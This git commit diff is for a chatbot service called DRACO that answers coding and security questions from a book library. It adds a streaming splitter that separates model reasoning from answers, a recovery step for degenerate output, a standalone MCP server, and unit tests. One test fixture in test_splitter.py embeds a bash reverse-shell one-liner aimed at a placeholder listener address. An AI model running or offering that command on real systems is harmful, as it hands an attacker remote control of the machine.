ThinkSplitter v3: narration gate + paragraph classifier + degenerate-output auto-recovery; num_predict 1100

This commit is contained in:
drjones
2026-10-01 17:58:50 -07:00
parent fe67d0114a
commit a4ef81a5d6
7 changed files with 378 additions and 98 deletions

70
app.py
View File

@@ -104,9 +104,17 @@ def chat():
def generate(): def generate():
yield f"data: {json.dumps({'type': 'sources', 'sources': sources})}\n\n" yield f"data: {json.dumps({'type': 'sources', 'sources': sources})}\n\n"
acc = ""
try: try:
for piece in core.stream_ollama(prompt): for channel, piece in core.stream_ollama(prompt):
yield f"data: {json.dumps({'type': 'token', 'text': piece})}\n\n" if channel == "answer":
acc += piece
if core.degenerate(acc):
core.unload_model() # auto-recovery: next request reloads clean
yield f"data: {json.dumps({'type': 'error', 'text': 'model hiccup — auto-recovered, ask again'})}\n\n"
yield f"data: {json.dumps({'type': 'done'})}\n\n"
return
yield f"data: {json.dumps({'type': 'token', 'channel': channel, 'text': piece})}\n\n"
except Exception as e: except Exception as e:
yield f"data: {json.dumps({'type': 'error', 'text': f'Model offline: {e}'})}\n\n" yield f"data: {json.dumps({'type': 'error', 'text': f'Model offline: {e}'})}\n\n"
yield f"data: {json.dumps({'type': 'done'})}\n\n" yield f"data: {json.dumps({'type': 'done'})}\n\n"
@@ -289,50 +297,23 @@ def sitemap():
return Response(body, mimetype="application/xml") return Response(body, mimetype="application/xml")
# ------------------------------------------------------------------ MCP (streamable-http) # ------------------------------------------------------------------ MCP (streamable-http)
try: # MCP lives in its own ASGI process (mcp_server.py, uvicorn :8013); nginx routes /mcp there.
from mcp.server.fastmcp import FastMCP # Status reflects the MCP service health.
mcp = FastMCP("draco", host="127.0.0.1", port=CFG.get("mcp_port", 8012),
streamable_http_path="/mcp")
@mcp.tool()
def draco_ask(question: str) -> str:
"""Ask DRACO a coding or security question. Answers are grounded in hundreds of
real programming and hacking books, with [n] citations and source titles."""
prompt, hits = core.build_prompt(question, k=CFG.get("rag_k", 6))
try:
answer = core.ask_ollama(prompt)
except Exception as e:
return f"Model offline: {e}"
src = "\n".join(f"[{i+1}] {h['title']} ({h['category']})" for i, h in enumerate(hits))
return f"{answer}\n\nSOURCES:\n{src}"
@mcp.tool()
def draco_search(query: str, k: int = 8) -> str:
"""Search DRACO's book library (BM25) for passages matching a topic."""
hits = core.search_library(query, k=k)
if not hits:
return "No passages matched."
return "\n\n".join(f"[{h['title']} · {h['category']} · score {h['score']}]\n{h['text'][:600]}" for h in hits)
@mcp.tool()
def draco_status() -> str:
"""DRACO health + library size."""
s = core.get_stats()
return (f"DRACO {CFG['model']} · {s['books']} books · {s['chunks']} passages · "
f"API: {CFG['base_url']}/api · MCP: {CFG['base_url']}/mcp")
from starlette.applications import Starlette
starlette_app = mcp.streamable_http_app()
app.mount("/mcp", starlette_app)
MCP_OK = True
except Exception as _e: # MCP optional at runtime
MCP_OK = False
MCP_ERR = str(_e)
@app.route("/mcp-info") @app.route("/mcp-info")
def mcp_info(): def mcp_info():
return jsonify(mcp=MCP_OK, error=MCP_ERR if not MCP_OK else None, mcp_ok = False
url=f"{CFG['base_url']}/mcp") try:
r = http.post("http://127.0.0.1:8013/mcp", timeout=6,
headers={"Content-Type": "application/json",
"Accept": "application/json, text/event-stream"},
json={"jsonrpc": "2.0", "id": 1, "method": "initialize",
"params": {"protocolVersion": "2025-03-26", "capabilities": {},
"clientInfo": {"name": "mcp-info-probe", "version": "1"}}})
mcp_ok = r.status_code == 200
err = None if mcp_ok else f"mcp service http {r.status_code}"
except Exception as e:
err = str(e)
return jsonify(mcp=mcp_ok, error=err, url=f"{CFG['base_url']}/mcp")
# ------------------------------------------------------------------ static # ------------------------------------------------------------------ static
@app.route("/static/logo.svg") @app.route("/static/logo.svg")
@@ -347,5 +328,4 @@ def logo():
# ------------------------------------------------------------------ main # ------------------------------------------------------------------ main
if __name__ == "__main__": if __name__ == "__main__":
print(f"DRACO starting · MCP={'ok' if MCP_OK else 'FAILED: ' + MCP_ERR}")
app.run(host="127.0.0.1", port=CFG["port"], threaded=True) app.run(host="127.0.0.1", port=CFG["port"], threaded=True)

15
deploy/draco-mcp.service Normal file
View File

@@ -0,0 +1,15 @@
[Unit]
Description=DRACO MCP server (streamable-http)
After=network.target
[Service]
Type=simple
WorkingDirectory=/opt/draco
ExecStart=/opt/draco/venv/bin/python3 -m uvicorn mcp_server:app --host 127.0.0.1 --port 8013 --log-level warning
Restart=always
RestartSec=5
Environment=PYTHONUNBUFFERED=1
Environment=DRACO_MCP_PORT=8013
[Install]
WantedBy=multi-user.target

View File

@@ -5,6 +5,14 @@ server {
access_log /var/log/nginx/draco.access.log; access_log /var/log/nginx/draco.access.log;
error_log /var/log/nginx/draco.error.log; error_log /var/log/nginx/draco.error.log;
location = /mcp {
proxy_pass http://127.0.0.1:8013;
proxy_set_header Host localhost:8013; # MCP SDK guard requires allowed host[:port]
proxy_buffering off; # SSE
proxy_cache off;
proxy_read_timeout 300s;
}
location / { location / {
proxy_pass http://127.0.0.1:8012; proxy_pass http://127.0.0.1:8012;
proxy_set_header Host $host; proxy_set_header Host $host;

View File

@@ -142,81 +142,217 @@ def build_prompt(question, k=6):
# ---------------------------------------------------------------- ollama # ---------------------------------------------------------------- ollama
import requests as http import requests as http
OPEN, CLOSE = "<think>", "</think>"
def strip_cot(text): def strip_cot(text):
text = re.sub(r"(?s)<think>.*?</think>", "", text) """Non-streaming: return (reasoning, answer). Handles tagged AND untagged CoT."""
if "</think>" in text: if OPEN in text:
text = text.split("</think>")[-1] pre, rest = text.split(OPEN, 1)
if "<think>" in text: # unbalanced opener: keep what follows if CLOSE in rest:
text = text.split("<think>")[-1] think, answer = rest.split(CLOSE, 1)
return text.strip() return (pre + think).strip(), answer.strip()
return "", rest.strip() # unbalanced opener
if CLOSE in text: # missing opener: preamble before close is reasoning
think, answer = text.split(CLOSE, 1)
return think.strip(), answer.strip()
return "", text.strip() # no tags: answer as-is
def ask_ollama(prompt): class ThinkSplitter:
r = http.post(f"{CFG['ollama_url']}/api/generate", """Streaming: yield (channel, piece) where channel is 'think' or 'answer'.
json={"model": CFG["model"], "prompt": prompt, "stream": False, Handles: <think>..</think>, missing opener (</think> closes), or fully untagged
"options": {"temperature": 0.4, "num_predict": 700, output — where meta-narration ("The user asks... Let me check the excerpts...")
"num_ctx": CFG.get("num_ctx", 8192)}}, is detected by a gated prefix + per-paragraph classifier and routed to 'think',
timeout=180) while real content paragraphs start the 'answer'."""
r.raise_for_status() PRE, THINK, NARR, ANSWER = range(4)
return strip_cot(r.json().get("response", "")) import re as _re
_BOLD = r"\*\*[^*\n]{1,60}\*\*"
class CoTFilter: NARR_START = _re.compile(
"""Streaming filter that drops <think>...</think> blocks token-by-token.""" r"^\s*(?:the user|user asks|user want|let me|i need|i'll|i will|i should|"
OPEN, CLOSE = "<think>", "</think>" r"okay\b|ok,|alright|hmm\b|to answer|so i|so,|we need|looking at|"
r"first,|step 1[:.]|" + _BOLD + r")", _re.IGNORECASE)
NARR_CONT = _re.compile(
r"^\s*(?:" + _BOLD +
r"|the (?:user|excerpts?|passages?|books?|sources?|quotes?)|none of"
r"|excerpt \[|excerpt \d|passage \d|quote \d|source \d"
r"|there (?:is|are) no|no (?:book|passage|excerpt|relevant)"
r"|based on (?:the|these|my)|so,?(?: i| the| this| none)"
r"|i (?:should|will|would|need|can't|cannot|don't|do not|think|see|notice)"
r"|to answer|as (?:the|these|per)|these (?:excerpts?|passages?|books?)"
r"|okay\b|alright|hmm|let me|however,? (?:the|none|there)|therefore,? (?:the|i)"
r"|in (?:short|conclusion|summary)|overall|finally,? (?:i|the))", _re.IGNORECASE)
GATE_CHARS = 140
GATE_MAX = 400 # hard cap: decide even without a paragraph boundary
def __init__(self): def __init__(self):
self.buf, self.in_think = "", False self.state = self.PRE
self.buf = "" # scanner buffer (PRE/THINK) OR paragraph buffer (NARR)
self.ans_buf = "" # text held by the undecided gate
self.gated = False # True once answer-vs-narration has been decided
def _emit(self, channel, s):
return [(channel, s)] if s else []
def _take(self, n=None):
if n is None:
piece, self.buf = self.buf, ""
else:
piece, self.buf = self.buf[:n], self.buf[n:]
return piece
def _gate_feed(self, s):
"""PRE-state text: hold until the start-of-answer gate can judge.
Decides at the first paragraph boundary after GATE_CHARS (or at GATE_MAX)."""
if self.gated:
return self._emit("answer", s)
self.ans_buf += s
boundary = self.ans_buf.find("\n\n", self.GATE_CHARS)
if boundary == -1 and len(self.ans_buf) < self.GATE_MAX:
return []
cut = boundary + 2 if boundary != -1 else len(self.ans_buf)
held, self.ans_buf = self.ans_buf[:cut], self.ans_buf[cut:]
self.gated = True
tail, self.buf = self.buf, "" # tail is NEWER than ans_buf; stream order = held + rest + tail
if self.NARR_START.match(held):
self.state = self.NARR
out = self._emit("think", held)
out += self._narr_feed(self.ans_buf + tail)
self.ans_buf = ""
return out
self.state = self.ANSWER
return self._emit("answer", held + self.ans_buf + tail)
def _narr_feed(self, s):
"""NARR state: classify complete paragraphs; first content paragraph = answer."""
self.buf += s
out = []
while "\n\n" in self.buf:
para, rest = self.buf.split("\n\n", 1)
if para.strip() and self.NARR_CONT.match(para):
out += self._emit("think", para + "\n\n")
self.buf = rest
else:
self.state = self.ANSWER
self.gated = True
out += self._emit("answer", self.buf)
self.buf = ""
return out
return out
def feed(self, s): def feed(self, s):
self.buf += s self.buf += s
out = "" out = []
while True: while True:
if self.in_think: if self.state == self.ANSWER:
i = self.buf.find(self.CLOSE) out += self._emit("answer", self._take())
if i == -1: return out
keep = min(len(self.buf), len(self.CLOSE) - 1) if self.state == self.NARR:
self.buf = self.buf[-keep:] if keep else "" out += self._narr_feed(self._take())
if self.state == self.NARR:
return out return out
self.in_think = False
self.buf = self.buf[i + len(self.CLOSE):]
else:
i_open = self.buf.find(self.OPEN)
i_close = self.buf.find(self.CLOSE)
# close-tag with no open-tag seen: drop the CoT preamble wholesale
if i_close != -1 and (i_open == -1 or i_close < i_open):
self.buf = self.buf[i_close + len(self.CLOSE):]
self.in_think = False
continue continue
if i_open == -1: i_open, i_close = self.buf.find(OPEN), self.buf.find(CLOSE)
keep = min(len(self.buf), max(len(self.OPEN), len(self.CLOSE)) - 1) if self.state == self.PRE:
if i_open != -1 and (i_close == -1 or i_open < i_close):
out += self._gate_feed(self._take(i_open))
self.gated = True # tagged CoT follows; gate no longer needed
self.buf = self.buf[len(OPEN):]
self.state = self.THINK
continue
if i_close != -1: # missing opener — preamble is reasoning
held, self.ans_buf = self.ans_buf, ""
out += self._emit("think", held + self._take(i_close))
self.buf = self.buf[len(CLOSE):]
self.state = self.ANSWER
continue
elif self.state == self.THINK:
if i_close != -1:
held, self.ans_buf = self.ans_buf, "" # rare held PRE text merges
out += self._emit("think", held + self._take(i_close))
self.buf = self.buf[len(CLOSE):]
self.state = self.ANSWER
continue
# no marker found: emit all but a tag-length tail
keep = min(len(self.buf), max(len(OPEN), len(CLOSE)) - 1)
cut = len(self.buf) - keep cut = len(self.buf) - keep
out += self.buf[:cut] if cut > 0:
self.buf = self.buf[cut:] piece = self._take(cut)
if self.state == self.THINK:
out += self._emit("think", piece)
else: # PRE: route through the gate
out += self._gate_feed(piece)
return out return out
out += self.buf[:i_open]
self.in_think = True
self.buf = self.buf[i_open + len(self.OPEN):]
def flush(self): def flush(self):
out, self.buf = ("" if self.in_think else self.buf), "" out = []
if self.state == self.PRE and (self.ans_buf or self.buf):
rest = self.ans_buf + self.buf # stream order: held text, then tail
self.ans_buf = self.buf = ""
if self.NARR_START.match(rest):
self.state = self.NARR
out += self._narr_feed(rest) # classify paragraphs; content → answer
else:
out += self._emit("answer", rest)
return out
if self.state == self.NARR:
residual, self.buf = self.buf, ""
if residual.strip():
out += self._emit("think" if self.NARR_CONT.match(residual) else "answer", residual)
return out
if self.buf:
piece = self._take()
if self.state == self.THINK:
out += self._emit("think", piece + self.ans_buf)
self.ans_buf = ""
else:
out += self._gate_feed(piece)
if self.ans_buf: # gate decided held text still pending
held, self.ans_buf = self.ans_buf, ""
out += self._emit("think" if self.NARR_START.match(held) else "answer", held)
return out return out
def stream_ollama(prompt): def stream_ollama(prompt):
"""Yield (channel, piece) tuples: channel 'think' or 'answer'."""
r = http.post(f"{CFG['ollama_url']}/api/generate", r = http.post(f"{CFG['ollama_url']}/api/generate",
json={"model": CFG["model"], "prompt": prompt, "stream": True, json={"model": CFG["model"], "prompt": prompt, "stream": True,
"options": {"temperature": 0.4, "num_predict": 700, "options": {"temperature": 0.4, "num_predict": CFG.get("num_predict", 1100),
"num_ctx": CFG.get("num_ctx", 8192)}}, "num_ctx": CFG.get("num_ctx", 8192)}},
timeout=(5, None), stream=True) timeout=(5, None), stream=True)
flt = CoTFilter() sp = ThinkSplitter()
for line in r.iter_lines(): for line in r.iter_lines():
if line: if line:
tok = json.loads(line).get("response", "") tok = json.loads(line).get("response", "")
if tok: if tok:
piece = flt.feed(tok) for channel, piece in sp.feed(tok):
if piece: yield channel, piece
yield piece for channel, piece in sp.flush():
tail = flt.flush() yield channel, piece
if tail:
yield tail def ask_ollama(prompt):
"""Non-streaming RAG answer (reasoning stripped, tagged or not)."""
r = http.post(f"{CFG['ollama_url']}/api/generate",
json={"model": CFG["model"], "prompt": prompt, "stream": False,
"options": {"temperature": 0.4, "num_predict": CFG.get("num_predict", 1100),
"num_ctx": CFG.get("num_ctx", 8192)}},
timeout=180)
r.raise_for_status()
_, answer = strip_cot(r.json().get("response", ""))
if degenerate(answer):
unload_model()
raise RuntimeError("model returned degenerate output — model unloaded, retry")
return answer
def degenerate(s):
"""vornith VRAM/session corruption signature: run of '?' chars."""
s = s.strip()
return len(s) >= 40 and s.count("?") / len(s) > 0.4
def unload_model():
"""Drop the model from VRAM so the next request reloads clean."""
try:
http.post(f"{CFG['ollama_url']}/api/generate",
json={"model": CFG["model"], "keep_alive": 0}, timeout=10)
except Exception:
pass
# ---------------------------------------------------------------- auth + metering # ---------------------------------------------------------------- auth + metering
def auth_user(req): def auth_user(req):

54
mcp_server.py Normal file
View File

@@ -0,0 +1,54 @@
#!/usr/bin/env python3
"""DRACO MCP server — standalone streamable-http ASGI app on :8013.
Run: uvicorn mcp_server:app --host 127.0.0.1 --port 8013 (or python3 mcp_server.py)
nginx routes /mcp here; Flask keeps :8012.
"""
import os
from mcp.server.fastmcp import FastMCP
import draco_core as core
from draco_core import CFG
MCP_PORT = int(os.environ.get("DRACO_MCP_PORT", 8013))
mcp = FastMCP("draco", host="127.0.0.1", port=MCP_PORT, streamable_http_path="/mcp")
@mcp.tool()
def draco_ask(question: str) -> str:
"""Ask DRACO a coding or security question. Answers are grounded in hundreds of
real programming and hacking books, with [n] citations and source titles."""
prompt, hits = core.build_prompt(question, k=CFG.get("rag_k", 6))
try:
answer = core.ask_ollama(prompt)
except Exception as e:
return f"Model offline: {e}"
src = "\n".join(f"[{i+1}] {h['title']} ({h['category']})" for i, h in enumerate(hits))
return f"{answer}\n\nSOURCES:\n{src}"
@mcp.tool()
def draco_search(query: str, k: int = 8) -> str:
"""Search DRACO's book library (BM25) for passages matching a topic."""
hits = core.search_library(query, k=max(1, min(k, 25)))
if not hits:
return "No passages matched."
return "\n\n".join(
f"[{h['title']} · {h['category']} · score {h['score']}]\n{h['text'][:600]}"
for h in hits)
@mcp.tool()
def draco_status() -> str:
"""DRACO health + library size."""
s = core.get_stats()
return (f"DRACO {CFG['model']} · {s['books']} books · {s['chunks']} passages · "
f"API: {CFG['base_url']}/api · MCP: {CFG['base_url']}/mcp")
app = mcp.streamable_http_app()
if __name__ == "__main__":
import uvicorn
uvicorn.run(app, host="127.0.0.1", port=MCP_PORT, log_level="warning")

View File

@@ -33,6 +33,8 @@ padding:3px 14px;font-size:12px;letter-spacing:2px;text-transform:uppercase;marg
.msg.assistant{color:var(--txt)} .msg.assistant{color:var(--txt)}
.msg .who{font-size:11px;color:var(--dim);text-transform:uppercase;letter-spacing:1px;display:block;margin-bottom:3px} .msg .who{font-size:11px;color:var(--dim);text-transform:uppercase;letter-spacing:1px;display:block;margin-bottom:3px}
.srcs{font-size:12px;color:var(--dim);border-left:2px solid var(--gold);padding-left:10px;margin-top:8px} .srcs{font-size:12px;color:var(--dim);border-left:2px solid var(--gold);padding-left:10px;margin-top:8px}
.thinking{color:var(--dim);font-style:italic;font-size:13px;border-left:2px solid var(--line);padding-left:10px;margin-bottom:8px;white-space:pre-wrap}
.thinking .who{font-size:10px;color:var(--dim);opacity:.7}
.cursor{display:inline-block;width:8px;height:15px;background:var(--gold);animation:blink 1s steps(1) infinite;vertical-align:text-bottom} .cursor{display:inline-block;width:8px;height:15px;background:var(--gold);animation:blink 1s steps(1) infinite;vertical-align:text-bottom}
@keyframes blink{50%{opacity:0}} @keyframes blink{50%{opacity:0}}
.chatrow{display:flex;gap:10px;margin-top:12px} .chatrow{display:flex;gap:10px;margin-top:12px}
@@ -141,7 +143,9 @@ async function ask(text){
try{ try{
const r=await fetch('/api/chat',{method:'POST',headers:{'Content-Type':'application/json'}, const r=await fetch('/api/chat',{method:'POST',headers:{'Content-Type':'application/json'},
body:JSON.stringify({q:text})}); body:JSON.stringify({q:text})});
const reader=r.body.getReader(),dec=new TextDecoder();let buf='',acc=''; if(!r.ok){const t=await r.text();let m='HTTP '+r.status;try{m=JSON.parse(t).error||m}catch(e){}
body.textContent='⚠ '+m;busy=false;go.disabled=false;return;}
const reader=r.body.getReader(),dec=new TextDecoder();let buf='',acc='',thinkEl=null;
while(true){const{value,done}=await reader.read();if(done)break; while(true){const{value,done}=await reader.read();if(done)break;
buf+=dec.decode(value,{stream:true});const lines=buf.split('\\n');buf=lines.pop()||''; buf+=dec.decode(value,{stream:true});const lines=buf.split('\\n');buf=lines.pop()||'';
for(const line of lines){if(!line.startsWith('data: '))continue; for(const line of lines){if(!line.startsWith('data: '))continue;
@@ -149,6 +153,12 @@ async function ask(text){
if(ev.type==='sources'&&ev.sources.length){ if(ev.type==='sources'&&ev.sources.length){
srcs.style.display='block'; srcs.style.display='block';
srcs.textContent='📚 '+ev.sources.map(s=>'['+(s.n)+'] '+s.title).join(' · '); srcs.textContent='📚 '+ev.sources.map(s=>'['+(s.n)+'] '+s.title).join(' · ');
}else if(ev.type==='token'&&ev.channel==='think'){
if(!thinkEl){thinkEl=document.createElement('div');thinkEl.className='thinking';
thinkEl.innerHTML="<span class='who'>◈ thinking </span><span class='tbody'></span>";
body.parentNode.insertBefore(thinkEl,body);}
thinkEl.querySelector('.tbody').textContent+=ev.text;
log.scrollTop=log.scrollHeight;
}else if(ev.type==='token'){acc+=ev.text;body.innerHTML=''; }else if(ev.type==='token'){acc+=ev.text;body.innerHTML='';
body.appendChild(document.createTextNode(acc));body.appendChild(document.createElement('span')).className='cursor'; body.appendChild(document.createTextNode(acc));body.appendChild(document.createElement('span')).className='cursor';
log.scrollTop=log.scrollHeight; log.scrollTop=log.scrollHeight;

77
test_splitter.py Normal file
View File

@@ -0,0 +1,77 @@
#!/usr/bin/env python3
"""Local unit test for ThinkSplitter against real vornith output shapes."""
import sys
sys.modules.setdefault("requests", type(sys)("requests")) # stub: splitter test needs no HTTP
sys.path.insert(0, "/Users/drjones/draco")
from draco_core import ThinkSplitter
def run(chunks):
sp = ThinkSplitter()
think, ans = "", ""
for c in chunks:
for ch, piece in sp.feed(c):
if ch == "think": think += piece
else: ans += piece
for ch, piece in sp.flush():
if ch == "think": think += piece
else: ans += piece
return think.strip(), ans.strip()
def tokens(s, n=7):
words = s.split(" ")
return [" ".join(words[i:i+n]) + " " for i in range(0, len(words), n)]
fail = 0
def check(name, chunks, want_think_prefix, want_ans_prefix):
global fail
t, a = run(chunks)
ok = t.startswith(want_think_prefix) and a.startswith(want_ans_prefix)
print(("PASS" if ok else "FAIL"), name)
if not ok:
fail += 1
print(" think:", repr(t[:120]))
print(" ans :", repr(a[:120]))
# 1. untagged multi-paragraph narration → answer (the real reverse-shell case)
s1 = ("The user asks about a \"reverse shell one-liner in bash.\" Let me look at the excerpts.\n\n"
"The excerpts are about UNIX Power Tools, Perl Cookbook, UNIX Hints and Hacks, "
"Essential System Administration. None of them contain information about a \"reverse shell one-liner.\"\n\n"
"So I should say the excerpts don't contain the answer, and answer from general knowledge "
"marked (general knowledge).\n\n"
"A reverse shell is a shell session initiated by the target machine back to the attacker's "
"listener. A classic bash one-liner is: bash -i >& /dev/tcp/10.0.0.1/4444 0>&1")
check("untagged narration→answer", tokens(s1), "The user asks", "A reverse shell is")
# 2. tagged <think>...</think>
s2 = ("<think>Simple factual question.</think>\n\nA stack buffer overflow occurs when a program "
"writes more data than a fixed-size buffer can hold.")
check("tagged think", tokens(s2), "Simple factual", "A stack buffer overflow occurs")
# 3. missing opener (bare </think>)
s3 = ("The user wants a one-sentence explanation of a stack buffer overflow. Let me be concise.\n"
"</think>\n\nA stack buffer overflow occurs when a program writes more data than a fixed-size "
"buffer on the stack can hold.")
check("missing opener", tokens(s3), "The user wants", "A stack buffer overflow occurs")
# 4. direct answer, no tags, no narration
s4 = ("A strong password hash uses a slow, salted algorithm such as bcrypt, scrypt, or argon2. "
"Fast hashes like MD5 and SHA-1 are unsuitable because attackers can brute-force billions "
"of guesses per second on modern GPUs.")
check("direct answer", tokens(s4), "", "A strong password hash uses")
# 5. narration with **bold** opener then list content
s5 = ("**Understanding the question**\nThe user wants to know about SQL injection. Let me examine the passages.\n\n"
"SQL injection occurs when untrusted input is concatenated into a query. Use parameterized "
"statements to prevent it.")
t, a = run(tokens(s5))
print("PASS" if a.startswith("SQL injection occurs") else "FAIL", "bold-opener narration (answer starts at content)")
if not a.startswith("SQL injection occurs"): fail += 1; print(" ans:", repr(a[:100]))
# 6. short direct answer (gate never reaches 140 chars → flush decides)
s6 = "Use bcrypt with a per-user salt."
t, a = run(tokens(s6))
print("PASS" if a.startswith("Use bcrypt") and t == "" else "FAIL", "short direct answer")
if not (a.startswith("Use bcrypt") and t == ""): fail += 1; print(" think:", repr(t[:80]), "ans:", repr(a[:80]))
print("FAILURES:", fail)
sys.exit(1 if fail else 0)